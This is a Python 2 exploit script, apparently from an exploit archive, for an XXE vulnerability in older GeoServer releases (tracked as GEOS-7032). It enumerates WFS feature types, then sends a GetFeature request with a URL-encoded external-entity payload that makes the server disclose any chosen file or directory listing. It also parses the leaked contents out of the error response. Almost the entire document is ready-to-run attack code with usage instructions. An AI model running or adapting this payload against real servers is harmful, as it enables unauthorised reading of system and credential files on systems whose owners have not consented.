66 lines
No EOL
2.7 KiB
Python
Executable file
66 lines
No EOL
2.7 KiB
Python
Executable file
# Exploit Title : GeoServer XXE
|
|
# Date : 11/08/2015
|
|
# Exploit Author : David Bloom (Script) - (Ping to Sven Claessens, Jacques Villemur and Eric Donners)
|
|
# Vendor homepage : http://geoserver.org
|
|
# Software Link : http://geoserver.org/release/stable
|
|
# Version : 2.7 : <2.7.1.1 / 2.6 : <2.6.4 / 2.5 : <2.5.5.1
|
|
# Tested : Client Windows, Server Linux/Jetty
|
|
# Vendor bug track : GEOS-7032
|
|
# CVE : No CVE
|
|
# Category : Webapps
|
|
# Description : An XXE vulnerability in geoserver allows to view file contents and list directories on the server.
|
|
|
|
|
|
from xml.etree import ElementTree
|
|
import sys
|
|
import urllib2
|
|
import urllib
|
|
|
|
def main():
|
|
print '\n-----------------------\nGeoServer XXE Exploit\nScript by David Bloom\nTwitter: @philophobia78\n-----------------------\n'
|
|
if len(sys.argv) != 3 :
|
|
print "Usage geoserver-xxe.py [URL] [File Or Dir]"
|
|
return
|
|
geoServerUrl = sys.argv[1]
|
|
fileName = sys.argv[2]
|
|
|
|
featuresUrl = geoServerUrl + "/wfs?request=GetCapabilities"
|
|
exploitUrl = geoServerUrl + "/wfs?request=GetFeature&SERVICE=WFS&VERSION=1.0.0&TYPENAME=@candidateFeature@&FILTER=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%20%3C!DOCTYPE%20foo%20[%20%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F@targetFile@%22%20%3E]%3E%3CFilter%20%3E%3CPropertyIsEqualTo%3E%3CPropertyName%3E%26xxe%3B%3C%2FPropertyName%3E%3CLiteral%3EBrussels%3C%2FLiteral%3E%3C%2FPropertyIsEqualTo%3E%3C%2FFilter%3E"
|
|
|
|
response = urllib2.urlopen(featuresUrl)
|
|
root = ElementTree.fromstring(response.read())
|
|
|
|
print "Searching geoserver features ... : \n"
|
|
gsFeatures = []
|
|
for node in root.iter():
|
|
if 'FeatureTypeList' in node.tag :
|
|
for feature in node.iter():
|
|
if 'Name' in feature.tag :
|
|
gsFeatures.append(feature.text)
|
|
print "Feature found :" + feature.text
|
|
if not gsFeatures:
|
|
print "No geoserver feature found, wrong url ?"
|
|
return
|
|
|
|
print "\nCandidate used : " + gsFeatures[0] + "\n"
|
|
print "Trying XXE : "
|
|
print "-------------\n"
|
|
exploitUrl = exploitUrl.replace("@candidateFeature@",gsFeatures[0])
|
|
exploitUrl = exploitUrl.replace("@targetFile@",fileName)
|
|
print exploitUrl + "\n\n"
|
|
try :
|
|
response = urllib2.urlopen(exploitUrl)
|
|
# Clean output from exceptions string
|
|
trashOutput = response.read()
|
|
beginRef = "Illegal property name:"
|
|
endRef = "for feature type"
|
|
fileStart = trashOutput.index(beginRef) + len(beginRef)
|
|
fileStop = trashOutput.index(endRef)
|
|
print "Output"
|
|
print "-------\n"
|
|
print trashOutput[fileStart:fileStop].strip()
|
|
except :
|
|
print "An error occured, maybe a premission error"
|
|
|
|
if __name__ == '__main__':
|
|
main() |